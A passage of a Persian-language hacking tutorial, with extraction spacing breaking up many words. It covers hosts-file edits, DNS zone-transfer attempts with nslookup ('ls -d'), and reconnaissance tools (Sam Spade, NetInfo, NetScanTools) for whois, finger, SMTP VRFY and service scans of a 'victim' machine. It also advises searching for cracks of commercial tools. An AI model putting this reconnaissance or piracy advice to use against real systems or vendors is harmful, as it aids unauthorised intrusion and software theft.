ﺏﻪ ایﻦ ﮐﺎر ﻣﺎ یﮏ ﻓﺎی ﻞ دﺱ ﺖ ﮐ ﺎری ﮐ ﺮدﻩ ﺕ ﺎ ﮐ ﺎﻣﭙﻴﻮﺕﺮ ﻣ ﺎن ه ﺮ وﻗ ﺖ ﺏ ﺎ ﺁن ﮐ ﺎﻣﭙﻴﻮﺕﺮ ﮐ ﺎر داﺷ ﺖ دیﮕ ﻪ ﺱ ﺮاغ ‪ DNS‬ان‬ ‫ﺱﺎیﺖ ﻧﺮود ﻣﺴﺘﻘﻴﻤﺎ ﺁدرس را ﺧﻮدش ﺏﺪاﻧﺪ و ﺱﺮاغ اون ﺏﺮود‪.‬‬ ‫ﺏﻪ ﭘﻮﺷﻪ ‪ c:\windows\host‬ﺏﺮوی ﺪ در ویﻨ ﺪوز ه ﺎی ‪ 9x‬و در ﺱ ﺮی ‪ NT‬ﺏ ﻪ ﭘﻮﺷ ﻪ ‪ c:\winnt\system32\drivers\etc\hosts‬ﺏﺮوی ﺪ و‬ ‫ﻓﺎیﻞ ‪ hosts‬ﺏﺎز ﮐﺮدﻩ ﺏﺎ ‪ notepad‬و ﺧﻄﻮﻃﯽ را ﺏﻪ ﺷﻴﻮﻩ زیﺮ ﺏﻪ ﺁن اﺽﺎﻓﻪ ﮐﻨﻴﺪ‪.‬‬ ‫ﺷﻤﺎ ﻣﻴﺪاﻧﻴﺪ ﮐﻪ ‪ IP‬ﺱﺎیﺖ ‪ www.xxxx.com‬ﺏﺮاﺏﺮ ‪ ٠٠٠٫٠٠٠٫٠٠٠٫٠٠٠‬اﺱﺖ ﺁﻧﮕﺎﻩ ﺏﺎ اﺽ ﺎﻓﻪ ﮐ ﺮدن ﺧ ﻂ زی ﺮ در ﻓﺎی ﻞ ‪ ، hosts‬ﻣ ﺮور ﮔ ﺮ‬ ‫دیﮕﺮ ﺟﺴﺘﺠﻮ اﻧﺠﺎم ﻧﻤﯽ دهﺪ و یﮏ راﺱﺖ ﺏﻪ ﺱﺮاغ ﺏﺮ ﻗﺮاری ارﺕﺒﺎط ﺏﺎ ﺁدرس ایﻨﺘﺮﻧﺘﯽ ﺱﺎیﺖ ﻣﻴﺮود‪.‬‬ ‫‪000.000.000.000‬‬ ‫‪www.xxxx.com‬‬ ‫ﺏﺎ ایﻦ ﮐﺎ ﺱﺮﻋﺖ دﺱﺖ رﺱﯽ ﺷﻤﺎ اﻓﺰایﺶ ﭘﻴﺪا ﻣﻴﮑﻨﺪ ﺏﻪ ﻓﻘﻂ ﺱﺎیﺘﯽ ﮐﻪ ﺏﺎ ایﻦ ﺷﻴﻮﻩ ﺏﻪ ﻓﺎیﻞ ﻣﻮرد ﻧﻈﺮ اﺽﺎﻓﻪ ﮐﺮدﻩ ایﺪ ‪ ،‬یﮏ راﻩ اﺱﺎس ﺕﺮ‪ ،‬ﮐﻪ ﻣﻦ‬ ‫ﺧﻴﻠﯽ ﻗﺒﻮل دارم اﺱﺘﻔﺎدﻩ از ﻧﺮم اﻓﺰار ‪ ONspeed‬ایﻦ وﺱﻴﻠﻪ ﺏﻪ ﻣﺮور ﮔﺮ ﺷﻤﺎ یﮏ ﻋﺪد ‪ IP‬اﺧﺘ ﺼﺎص ﻣﻴﺪه ﺪ و دیﮕ ﺮ ﺻ ﻔﺤﺎت ﺷ ﻤﺎ در ﺱ ﺮور‬ ‫ﺕﺎن ﻧﻤﯽ ﺁیﺪ و ﻣﺴﺘﻘﻴﻤﺎ ﭘﻴﺶ ﺷﻤﺎ ﻣﯽ ایﺪ ‪ .‬اﻣﺘﺤﺎن ﮐﻨﻴﺪ ﻣﻌﺘﺎد ﻣﻴﺸﻮد اﻧﺸﺎء اﷲ ‪ .‬اﻟﺒﺘﻪ ﺏﺎهﺎش ﮐﺎرهﺎی زیﺎدی ﻣﻴﺸﻮد ﮐﺮد ﺧﻮدﺕﺎن اﻣﺘﺤﺎن ﮐﻨﻴﺪ ‪.‬‬ ‫‪ -۴‬ﮔﺮﻓﺘﻦ اﻃﻼﻋﺎت از ﺱﻴﺴﺘﻢ ‪DNS‬‬ ‫ﺡﺎﻻ رﺱﻴﺪیﻢ ﺏﻪ دو ﻣﻄﻠﺒﯽ ﮐﻪ از اول ﻣ ﯽ ﺧﻮاﺱ ﺘﻢ در ﺏ ﺎرﻩ اش ﺕﻮﺽ ﻴﺢ ﺏ ﺪم و ﻣﺠﺒ ﻮر ﺷ ﺪم ﺏ ﻪ ای ﻦ هﻤ ﻪ ﺕﻮﺽ ﻴﺢ اﺽ ﺎﻓﻪ اﻟﺒﺘ ﻪ ﺏ ﺪ ه ﻢ ﻧﺒ ﻮد ﺡﻤ ﻼت‬ ‫‪ WAR DIALER‬را ﮐﺎﻣﻼ ﺕﻮﺽﻴﺢ دادم دیﮕﻪ ﺏﺲ اﺱﺖ ﺡﺮف اﺽﺎﻓﻪ ﻣﻴﺮیﻢ ﺱﺮ اﺻﻞ ﻣﻄﻠﺐ ‪.‬‬ ‫ﻣﻘﺪﻣﻪ ‪:‬‬ ‫‪ DNS‬اول ﮐﻠﻤﺎت ‪ Domain Name Server‬اﺱﺖ و یﻌﻨﯽ ﺱﻴﺴﺘﻢ ﻧﺎم ﮔﺬاری ﺡﻮزﻩ‪.‬‬ ‫ﺧﻮب ﺏﺮﮔﺮدیﻢ ﺱﺮ ﮐﺎرﻣﺎن ﻣﻴﺨﻮاﺱﺘﻢ درﺏﺎرﻩ دﺱﺘﻮر ‪ nslookup‬یﮏ ﺱﺮی ﺕﻮﺽﻴﺢ ﺏﺪهﻢ ‪.‬‬ ‫اوﻻ ﺏﮕﻢ ایﻦ دﺱﺘﻮر ﺏﺮای ﮔﺮﻓﺘﻦ رﮐﻮرد هﺎی داﺧﻞ ‪ DNS‬اﺱﺖ‪ .‬اﻣﺎ یﮏ ﭼﻨﺪ ﺕﺎ ﮐﺎر دیﮕﻪ هﻢ ﻣﻴﮑﻨﻪ ﮐﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﺏﻪ ﺷﻤﺎ‬ ‫ایﻦ دﺱﺘﻮر در ﺧﻂ ﻓﺮﻣﺎن ) ﺏﺎ ﻧﻮﺷﺘﻦ ‪ CMD‬در ‪ RUN‬ﻣﻴﺘﻮاﻧﻴﺪ از ﺧﻂ ﻓﺮﻣﺎن اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ( ﮐﺎر ﻣﻴﮑﻨﺪ‪.‬‬ ‫در ﺧﻂ ﻓﺮﻣﺎن ﻣﯽ ﻧﻮیﺴﻴﻢ‪:‬‬ ‫‪Nslookup‬‬ ‫ﭘﺲ از اﺟﺮای دﺱﺘﻮر ﺏﺎیﺪ ﺏﺎ ﻓﺮﻣﺎن ‪ server‬ﻧﺎم ﺱﺮور را ﺏﻪ ﺏﺮﻧﺎﻣﻪ داد ﺏﻪ ایﻦ ﺻﻮرت ‪:‬‬ ‫‪Server xxxxxxxxxx‬‬ ‫ﮐﻪ ﺏﻪ ﺟﺎی ‪ x‬هﺎ ﻧﺎم ‪ DNS‬ﺱﺎیﺖ را ﻣﻴﻨﻮیﺴﻴﻢ ) ‪ IP‬ﺏﻮد اﺷﮑﺎل ﻧﺪارد ( ﺏﻌﺪ ﻓﺮﻣﺎن زیﺮ را در ﺧﻂ ﻓﺮﻣﺎن ﻣﻴﻨﻮیﺴﻴﻢ ‪:‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪١٥‬‬

‫‪Set type=any‬‬ ‫ﺏﺎ ﻧﻮﺷﺘﻦ ایﻦ دﺱﺘﻮر ﻣﻴﮕﻴﻢ هﺮ ﺁن ﭼﻪ هﺴﺖ ﺏﺮای ﻣﺎ ﺏﻔﺮﺱﺘﺪ وﺏﺎ ﻓﺮﻣﺎن زیﺮ ﺕﻤﺎم رﮐﻮرد هﺎ را ﻣﻴﮕﻴﺮیﻢ ‪:‬‬ ‫‪Ls –d xxxxxxxxxx .‬‬ ‫ﮐﻪ ﺏﺠﺎی ‪ xxx‬هﺎ ﻧﺎم ﺱﺎیﺖ را ﻣﻴﻨﻮیﺴﻴﻢ ) ﺏﺪون ‪( www‬ﺡﺘﻤﺎ ﻧﻘﻄﻪ را ﺁﺧﺮش ﺏﮕﺰاریﺪ‪.‬‬ ‫ﺧﻮب ﮐﺎر اﺻﻠﯽ ایﻦ دﺱﺘﻮر ﺏﻪ ﺷﻤﺎ هﺎ ﮔﻔﺘﻢ اﻣﺎ دوﺕﺎ ﮐﺎرایﯽ دیﮕﻪ هﻢ دارد ﮐﻪ ﻣﻴﮕﻢ‪:‬‬ ‫‪ -١‬ﺏﺮای ﺕﺸﺨﻴﺺ ایﻨﮑﻪ ﺁیﺎ ‪ IP‬اﺱﺘﺎﺕﻴﮏ یﺎ دیﻨﺎﻣﻴﮏ ‪ IP .‬هﺎی اﺱﺘﺎﺕﻴﮏ )ﺙﺎﺏﺖ( ‪ IP‬هﺎی هﺴﺘﻦ ﮐﻪ ﮐﺎﻣﭙﻴﻮﺕﺮ هﺎی ﮐﻪ هﻤﻴﺸﻪ در ﺷﺒﮑﻪ ه ﺴﺘﻦ‬ ‫ﺁﻧﻬﺎ دارﻧﺪ ﻣﺜﻞ وب ﺱﺮور هﺎ ‪ ،‬هﺎﺱﺘﻴﻨﮓ هﺎ و‪ ...‬اﻣ ﺎ ‪ IP‬ه ﺎی دیﻨﺎﻣﻴ ﮏ )ﻣﺘﻐﻴ ﺮ( ‪ IP‬ه ﺎی ه ﺴﺘﻦ ﮐ ﻪ ﻣ ﻦ ﺷ ﻤﺎ داری ﻢ و ﻟﺤﻈ ﻪ ای اﺱ ﺖ ﻣ ﺎل‬ ‫ﺷﺨﺺ ﺙﺎﺏﺖ ﻧﻴﺴﺖ ﻣﻌﻤﻮﻻ هﻤﻪ ﮐﻪ ﺏﺎ ﻣﻮدم ﻣﻴﺮن ﺏﺎﻻ از ایﻦ ﻧﻮع ‪ IP‬دارﻧﺪ‪.‬‬ ‫ﻓﺮﻣﺎن ‪ nslookup‬را در ﺧﻂ ﻓﺮﻣﺎن ﺏﻪ ﺻﻮرت زیﺮ اﺟﺮا ﻣﻴﮑﻨﻴﻢ‬ ‫‪Nslookup hostname‬‬ ‫ﮐﻪ ﺏﻪ ﺟﺎی ‪ hostname‬ﻣﺎ ‪ IP‬ﻣﻮرد ﻧﻈﺮ ﺧﻮد را ﻣﻴﻨﻮیﺴﻴﻢ‪.‬اﮔﺮ ﻧﺘﻴﺠﻪ ایﻦ ﺏﻮد ﮐﻪ ایﻦ ﻣﻴﺰﺏﺎن وﺟﺪ ﻧﺪارد ﻃﺮف ﻣﺎ دیﻨﺎﻣﻴﮏ اﺱﺖ وﻟ ﯽ اﮔ ﺮ اﺱ ﻢ‬ ‫ﻣﻴﺰﺏﺎن را ﺏﻪ ﻣﺎ ﺏﺪهﺪ ﻣﻄﻤﺌﻦ ﺏﺎﺷﻴﺪ ﻣﺎﺷﻴﻦ ﻣﻮرد ﻧﻈﺮ اﺱﺘﺎﺕﻴﮏ اﺱﺘﺎﺕﻴﮏ اﺱﺖ ‪.‬‬ ‫‪ -٢‬ایﻦ یﮑﯽ را زیﺎد ﺕﻮﺽﻴﺤﺎت ﻧﻤﻴﺪهﻢ ﺕﺎ ﺧﻮدﺕﻮن هﻢ یﮏ ذرﻩ ﺕﻼش ﮐﻨﻴﺪ !! ) یﮏ راهﻨﻤﺎیﯽ داﺧﻞ ‪ Help‬یﮏ ﺟﺴﺘﺠﻮ ﮐﻨﻴﺪ (‬ ‫‪ -۵‬ﻧﺮم اﻓﺰارهﺎی ﻣﺮﺑﻮﻃﻪ‬ ‫ﺷﺎیﺪ ﺕﺎ ﺏﻪ ﺡﺎل ﻓﮑﺮ ﮐﻨﻴﺪ یﮑﻢ ﮐﺎر ﺱﺨﺘﻪ وﻟﯽ اﺕﻔﺎﻗﺎ ﺧﻴﻠﯽ راﺡﺖ اﺱﺖ یﮏ ﭼﻨﺪ ﻧﺮم اﻓﺰار ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ﺕﺎ ﮐﻤﯽ راﺡﺖ ﺕﺮ ﺏﺸﻮد ‪.‬‬ ‫‪Sam Spade -١‬‬ ‫‪NET INFO -٢‬‬ ‫‪Net Scan Tools -٣‬‬ ‫‪. WS-Ping Pro Pack -۴‬‬ ‫‪ -۵‬و‪...‬‬ ‫‪-١‬اﺏﺰار هﻤﻪ ﻣﻨﻈﻮرﻩ ‪: Sam Spade‬‬

‫ﺧﻮب ﺕﺎ ﺏﻪ ﺡﺎل ﺷﺎیﺪ اﺱﻢ ایﻦ زیﺎد ﺷﻨﻴﺪﻩ ﺏﺎﺷﻴﺪ‪ .‬اﺏﺰار ﺱﺎدﻩ ای و اﻟﺒﺘ ﻪ ﮐﺎﻣ ﻞ ﺏ ﺮای ﺷﻨﺎﺱ ﺎیﯽ ﻣﻘ ﺪﻣﺎﺕﯽ ه ﺪف اﺱ ﺖ‪ .‬ای ﻦ اﺏ ﺰار رایﮕ ﺎن اﺱ ﺖ و ﻣ ﯽ‬ ‫ﺕﻮاﻧﻴﺪ از ﺁدرس ‪ http://www.samspade.org‬ﺏﮕﻴﺮیﺪ روی ﺕﻤﺎم ﻧﺴﺦ ویﻨﺪوز ﮐﺎر ﻣﻴﮑﻨﺪ دیﮕﻪ هﻴﭽﯽ ‪.‬‬ ‫دارای ﻗﺎﺏﻠﻴﺖ هﺎی زیﺮ ﻣﯽ ﺏﺎﺷﺪ ‪:‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪١٦‬‬

‫‪ : Whios -١‬ﺏﻪ ﻃﻮر ﻣﺴﺘﻘﻴﻢ ﺏﺎ ﺱﺮویﺲ دهﻨﺪﻩ ‪ Whios‬ارﺕﺒﺎط ﺏﺮﻗﺮار ﮐﺮدﻩ و اﻃﻼﻋﺎت ﺏﺪرد ﺏﺨﻮر را ﻣﻴﮕﻴ ﺮد‪ .‬ﭼ ﻮن از ﺱ ﺎیﺖ ﺧ ﻮدش ﺏ ﺮای‬ ‫ﺟﺴﺘﺠﻮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ ﻧﻴﺎزی ﺏﻪ دﺱﺖ ﮐﺎری ﻧﺪارد‪.‬‬ ‫‪: IP Block Whios -٢‬ﻗﺎدر اﺱﺖ ﺕﻌﻴﻴﻦ ﮐﻨﺪ ﮐﻪ یﮏ ﻣﺠﻤﻮﻋﻪ ‪ IP‬ﻣﺘﻌﻠﻖ ﺏﻪ ﮐﺪام ﺷﺮﮐﺖ یﺎ ﻣﻮﺱﺴﻪ اﺱﺖ ‪.‬‬ ‫‪ : Ping -٣‬ﺏﺮای ﮐﺸﻒ ‪ IP‬ﻗﺮﺏﺎﻧﯽ از ﺁن اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد اﻟﺒﺘﻪ اﮔﺮ ﺁن ﻣﺎﺷﻴﻦ ﻓﻌﺎل ﺏﺎﺷﺪ‪.‬‬ ‫‪ : DNS Zone Transfer -۴‬هﻤﺎﻧﻄﻮر ﮐﻪ در ﺏﺎﻻ اﺷﺎرﻩ ﺷﺪ ﺏﺎﻋﺚ اﻧﺘﻘﺎل ﺕﻤﺎم رﮐﻮرد هﺎی ﻣﻮﺟﻮد در ﺁن ﻣﻴﺸﻮد‪ ) .‬ﺏﺎی ﺪ ﺁدرس ‪ DNS‬را ﺏﺪهﻴ ﺪ‬ ‫ﺏﻪ ﺏﺮﻧﺎﻣﻪ (‪.‬‬ ‫‪ : Nslookup -۵‬ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﺧﻮدﺕﺎن دﺱﺘﯽ ﺏﺎ ﺁن ) ‪ ( DNS‬ﻓﻌﻞ اﻧﻔﻌﺎل داﺷﺘﻪ ﺏﺎﺷﺪ‪.‬‬ ‫‪:« DIG -۶‬در ﺏﺎرﻩ یﮏ ﺱﻴﺴﺘﻢ ﺧﺎص از ‪ DNS‬اﻃﻼﻋﺎت ﺕﮑﻤﻴﻠﯽ ﻣﻴﮕﻴﺮد ‪.‬‬ ‫‪ : Trace route -٧‬ایﻦ یﮑﯽ ﻓﻬﺮﺱﺘﯽ از ﻣﺴﻴﺮیﺎب هﺎ و ﮐﻼ ﻣﺎﺷﻴﻦ هﺎی ﺏﻴﻦ ﺷﻤﺎ و ﻣﺎﺷﻴﻦ هﺪف را از ﺟﻤﻠﻪ دیﻮار ﺁﺕﺶ ﭘﺮﮐﺴﯽ و‪ ...‬را ﻣﺸﺨﺺ‬ ‫ﻣﻴﮑﻨﺪ ‪.‬‬ ‫‪ : Finger -٨‬اﮔﺮ ﺱﺮویﺴﯽ ﺏﻪ هﻤﻴﻦ ﻧﺎم روی ﻣﺎﺷﻴﻦ هﺪف ﻓﻌﺎل ﺏﺎﺷﺪ ﺏﺎ اﺟﺮای ایﻦ ﻣﻴﺘﻮاﻧﻴﺪ ﻟﻴﺴﺘﯽ از ﮐﺎرﺏﺮ هﺎی ﺁن را ﺏﺒﻴﻨﻴﺪ‪.‬‬ ‫‪ : SMTP VRFY -٩‬ﻣﻴﺘﻮان ﻓﻬﻤﻴﺪ ﮐﻪ ﻣﺜﻼ ﻓﻼن ﺁدرس ﭘﺴﺘﯽ روی ﺱﺮویﺲ دهﻨﺪﻩ وﺟﺪ دارد یﺎ ﮐﻪ ﺧﻴﺮ ‪.‬‬ ‫‪ : Web Browser -١٠‬یﮏ ﻣﺮور ﮔﺮ وب یﺎ ﺏﻪ اﺻﻄﻼﺡﯽ ﮐﺎوﺷﮕﺮ ﺷ ﺒﮑﻪ اﺱ ﺖ ﮐ ﻪ اﻟﺒﺘ ﻪ ﺻ ﻔﺤﺎت را ﺏ ﻪ زﺏ ﺎن ‪ HTML‬و ﻓﺮایﻨ ﺪ ﺁن ﻧﻤ ﺎیﺶ‬ ‫ﻣﻴﺪهﺪ‪.‬‬ ‫‪: Net Info -٢‬‬

‫ﻧﺮم اﻓﺰار ﺕﺠﺎری اﺱﺖ وﻟﯽ وﻗﺘﯽ اﺱﻢ ﺁن را ‪ +‬واژﻩ ‪ CRACK‬در ﻣﻮﺕﻮر هﺎی ﺟﺴﺘﺠﻮ وارد ﮐﻨﻴﺪ ﻣﺸﮑﻞ ﺕﺠﺎری ﺏﻮدﻧﺶ ﺡﻞ ﻣﯽ ﺷﻮد‪.‬‬ ‫ﻧﺴﺒﺖ ﺏﻪ ﻧﺮم اﻓﺰار ‪ SAM SPADE‬یﮏ ﺱﺮی ﭼﻴﺰ ﺏﻴﺸﺘﺮ و یﮏ ﺱﺮی ﮐﻤﺘﺮ دارد‪.‬دارای ﻗﺎﺏﻠﻴﺘﻬﺎی زیﺮ ﻣﯽ ﺏﺎﺷﺪ ‪:‬‬ ‫‪ : Local Info -١‬هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﻌﻨﯽ واژﻩ و ﻋﮑﺲ ﻣﻴﺒﻴﻨﻴﺪ یﮏ ﺱﺮی اﻃﻼﻋﺎت درﺏﺎرﻩ ﻣﺎﺷﻴﻨﯽ ﮐﻪ روش ﻧﺮم اﻓﺰار اﺟﺮا ﻣﻴﮑﻨ ﻴﻢ ﺏ ﻪ ﻣ ﺎ ﻣﻴﺪه ﺪ ‪.‬‬ ‫ﻣﺜﻼ ‪ :‬ﻧﺎم ﮐﺎرﺏﺮ ‪ ،‬ﺁدرس ‪ IP‬ﻣﺎﺷﻴﻦ ‪ ،‬ﻧﺴﺨﻪ ‪ WIN Sock‬و ﻣﺸﺨﺼﺎت ﺁن ) ﺁﻧﻬﺎیﯽ ﮐﻪ ﺏﺮﻧﺎﻣﻪ ﻧﻮیﺴﯽ ﺕﺤﺖ ﺷﺒﮑﻪ ﺏﺎ ‪ C/C++‬ﻣﻴﮑﻨﻨﺪ ﻣﻴﺪاﻧﻨﺪ ﭼﯽ‬ ‫هﺴﺖ‪ ، (.‬ﺡﺎﻟﺖ ﺱﻴﺴﺘﻢ ﺕﻌﺪاد ﺱﻮﮐﺖ هﺎی ﺁزاد ‪ ،‬اﻧﺪازﻩ ﺏﺴﺘﻪ هﺎی ‪. UDP‬‬ ‫‪ : Connection -٢‬ﻣﺸﺨﺼﺎت ﺕﻤﺎم ارﺕﺒﺎط ‪ TCP‬و ﭘﻮرت هﺎی ﺏﺎز ‪ UDP‬و ﺡﺎﻟﺖ ارﺕﺒﺎﻃﯽ ﻣﻮﺟﺪ را ﻧﺸﺎن ﻣﻴﺪهﺪ‪.‬‬ ‫‪ : PING -٣‬دﻗﻴﻘﺎ ﻣﺜﻞ ‪ SAM SPADE‬اﺱﺖ ﮐﺎرش ‪.‬‬ ‫‪ : TRACE -۴‬دﻗﻴﻘﺎ ﻣﺜﻞ ﮔﺰیﻨﻪ ‪ Nslookup‬در ﻧﺮم اﻓﺰار ‪ SAM SPADE‬اﺱﺖ ﮐﺎرش ‪.‬‬ ‫‪ : Lookup -۵‬دﻗﻴﻘﺎ ﻣﺜﻞ ‪ SAM SPADE‬اﺱﺖ ﮐﺎرش ‪.‬‬ ‫‪ : Finger -۶‬دﻗﻴﻘﺎ ﻣﺜﻞ ‪ SAM SPADE‬اﺱﺖ ﮐﺎرش ‪.‬‬ ‫‪ : Whois -٧‬دﻗﻴﻘﺎ ﻣﺜﻞ ‪ SAM SPADE‬اﺱﺖ ﮐﺎرش ‪.‬‬ ‫‪ : Day Time -٨‬ایﻦ یﮑﯽ ﺱﻌﯽ ﻣﻴﮑﻨﺪ ﮐﻪ ﺱﺎﻋﺖ و ﺕﺎریﺦ ﻣﺎﺷﻴﻦ هﺪف درﺻ ﻮرت اﺟ ﺮای ﺱﺮوی ﺴﯽ ﺏ ﻪ هﻤ ﻴﻦ ﻧ ﺎم را ﮐ ﺸﻒ ﮐﻨ ﺪ ) ﺏ ﺮای ﻓﻬﻤﻴ ﺪ‬ ‫ایﻨﮑﻪ ایﻦ ﻣﺎﺷﻴﻦ ﺕﻮ ﮐﺪام ﮐﺸﻮر اﺱﺖ اﻟﺒﺘ ﻪ اﺏ ﺰار ﮔﺮاﻓﻴﮑ ﯽ ﺏﻬﺘ ﺮی اﺱ ﺖ در ای ﻦ ﺏ ﺎرﻩ ﺏ ﺎ ﻧ ﺎم ‪ VISAL RUTOR‬ﮐ ﻪ ای ﻦ ﮐ ﺎر ﻣﻄﻤ ﺌﻦ ﺕ ﺮ اﻧﺠ ﺎم‬ ‫ﻣﻴﺪهﺪ (‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪١٧‬‬

‫‪ : Time -٩‬ﺏﺮای ﺏﺪﺱﺖ ﺁوردن زﻣﺎن از یﮏ ﺱﺮویﺲ دهﻨﺪﻩ ﻣﺸﺨﺺ ﮐﻪ اﻟﺒﺘﻪ ﮐﺎرﺏﺮ ﺏﺎیﺪ ﺁن را ﻣﺸﺨﺺ ﮐﻨﺪ‪.‬‬ ‫‪ : HTML -١٠‬دﻗﻴﻘﺎ ﻣﺜﻞ ﮔﺰیﻨﻪ ‪ Web Browser‬در ﻧﺮم اﻓﺰار ‪ SAM SPADE‬اﺱﺖ ﮐﺎرش ‪.‬‬ ‫‪ : Scanner -١١‬ایﻦ ﮔﺰیﻨﻪ را ‪ SAM‬هﻢ دارد ﮐﻪ ﺏﺮای ﭘﻴﺪا ﮐﺮدن ﻣﺎﺷﻴﻦ هﺎی ﻓﻌﺎل در یﮏ رﻧﺞ ﻣﺸﺨﺺ از ‪ IP‬ﮐﻪ ﺧﻮدﺕﻮن ﺏﻬﺶ ﻣﯽ دهﻴﺪ‪.‬‬ ‫‪ : Services -١٢‬یﮏ ﭼﻴﺰ ﺧﻴﻠﯽ ﺏﺪرد ﺏﺨﻮر اﺱﺖ ﺏ ﺎ ﮔ ﺮﻓﺘﻦ ﻧ ﺎم ﻣﺎﺷ ﻴﻦ از ﻣ ﺎ ﺱﺮوی ﺴﻬﺎی ﻣﻌ ﺮوف و ﺷ ﻨﺎﺧﺘﻪ ﺷ ﺪﻩ ای ﯽ را ﮐ ﻪ ﺁن ﻣﺎﺷ ﻴﻦ اراﺋ ﻪ‬ ‫ﻣﻴﺪهﺪ را ﭘﻴﺪا ﮐﺮدﻩ و ﺏﻪ ﻣﺎ ﻧﺸﺎن ﻣﻴﺪهﺪ‪.‬‬ ‫دیﮕﻪ هﻤﻴﻦ‪.‬‬ ‫‪: Net Scan Tools -٣‬‬

‫ﺧﻮب ایﻦ هﻢ ﺕﺠﺎری وﻟﯽ ﮐﺎرای ﺁن اﺱﻴﺪی و اﺱﺎﺱﯽ و درﺱﺖ ‪ ،‬ﻣﻦ ﻗﺒﻮل دارم ایﻦ ‪ ،‬اﻟﺒﺘﻪ از ﻧﻮع ﻧﺮم اﻓﺰارهﺎ زیﺎد هﺴﺖ یﮏ ﺟﻮر ﺁیﯽ ﺱﻠﻴﻘﻪ ای‬ ‫اﺱﺖ اﻟﺒﺘﻪ ﻣﻦ ﺁﻧﻬﺎیﯽ را ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ ﮐﻪ از ایﻦ هﻤﻪ ﺟﻮاب ﺧﻮد ﺷﺎن را درس ﭘﺲ دادﻩ ﺏﺎﺷﻨﺪ ﺧﻮب ﺏﺴﻪ ﺏﺮیﻢ ﺱﺮ ﮐﺎرﻣﺎن ‪.‬‬ ‫ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ یﮏ راﺱﺖ ﺏﺮیﺪ در ﻗﺴﻤﺖ ‪ TOOLS‬ﭼﻮن ﺏﻘﻴﻪ ﻣﻨﻮهﺎی ﺁن ﺏﺮای ﺕﺒﻠﻴﻎ اﺱﺖ‪.‬دارای ﮔﺰیﻨﻪ هﺎیﯽ ﻣﺎﻧﻨﺪ دو اﺏﺰار ﻗﺒﻠﯽ اﺱﺖ اﻣﺎ ﺏﺎ ای ﻦ‬ ‫ﺕﻔﺎوت ﮐﻪ ﮐﺎﻣﻞ ﺕﺮ و اﻟﺒﺘﻪ ﻗﻮی ﺕﺮ ) ﻣﻦ ﺏﺎ ﺕﺠﺮﺏﻪ ای ﮐﻪ دارم ﭼﻮن ﻣﺎ داریﻢ از یﮏ ﻧﺮم اﻓﺰار اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﺱ ﻌﯽ ﮐﻨﻴ ﺪ هﻤﻴ ﺸﻪ از ﺏ ﻪ روز ﺏ ﻮدن‬ ‫ﺁن ﻣﻄﻤﺌﻦ ﺏﺎﺷﻴﺪ ‪ ،‬دوﻣﺎ ﺱﻌﯽ ﮐﻨﻴﺪ هﻤﻴﺸﻪ یﮏ ﮐﺎر ﺏﺎ ﭼﻨﺪ ﻧﺮم اﻓﺰار ﻣﺨﺘﻠﻒ اﻧﺠﺎم ﺏﺪهﻴﺪ و ﻧﺘﻴﺠﻪ هﺎ را ﺏﺎ هﻢ ﻣﻘﺎیﺴﻪ ﮐﻨﻴﺪ زی ﺮا ه ﺮ ﮐ ﺪام در اﻧﺠ ﺎم‬ ‫یﮏ ﮐﺎری ﻗﻮی هﺴﺘﻦ ( ﮐﻪ ﻣﻦ از ﺕﻮﺽﻴﺢ ﺁﻧﻬﺎ ﺻﺮف ﻧﻈﺮ ﮐ ﺮدﻩ ام ‪ .‬اﻟﺒﺘ ﻪ ای ﻦ را اﺽ ﺎﻓﻪ ﮐ ﻨﻢ ای ﻦ ﺱ ﺮویﺲ ه ﺎ دیﮕ ﻪ ﻣﻨ ﺴﻮخ ﺷ ﺪﻩ و ه ﻴﭻ راهﺒ ﺮ‬ ‫ﺷﺒﮑﻪ ای ریﺴﮏ ﻧﻤﻴﮑﻨﺪ و ﺁﻧﻬﺎ را ﻓﻌﺎل ﺏﮕﺰارد ﻣﺜﻞ ‪. Chargen ، Quote ، Daytime ، echo :‬‬ ‫ﮐﻠﻴﺪ هﺎی ‪ Database Tests‬و ‪ TimeSync‬و ‪ Winsock Info‬و ‪ NetBIOS‬هﻤﮕﯽ ‪ Local‬یﻌﻨﯽ ﻓﻘ ﻂ ﻧﺘ ﺎیﺞ ﺏ ﺮای ﮐ ﺎﻣﭙﻴﻮﺕﺮ ﺷ ﻤﺎ اﺱ ﺖ‬ ‫را ﻧﺸﺎن ﻣﻴﺪهﺪ ‪ .‬ﮐﻪ اوﻟﯽ ) ‪ ( Database Tests‬ﺱﺮویﺲ هﺎ و ﭘﻮرت هﺎی ﻣﺮﺏﻮﻃ ﻪ ه ﺮ ﮐ ﺪام را ﻧ ﺸﺎن ﻣﻴﺪه ﺪ و ‪ ...‬راﺡ ﺖ ﻣﻴﺘﻮاﻧﻴ ﺪ ﺏ ﺎ ﺁن ﺏ ﺎزی‬ ‫ﮐﻨﻴ ﺪ ﺕ ﺎ ﺏﻔﻬﻤﻴ ﺪ ﭼ ﻪ ﮐ ﺎر ﻣﻴﮑﻨ ﺪ ‪ .‬دوﻣ ﯽ ﺏ ﺮای ﺕﻐﻴﻴ ﺮ زﻣ ﺎن اﺱ ﺖ و ﺱ ﻮﻣﯽ را ﮐ ﻪ ﺏ ﺎﻻ ﮔﻔ ﺘﻢ ﭼ ﯽ ه ﺴﺖ و 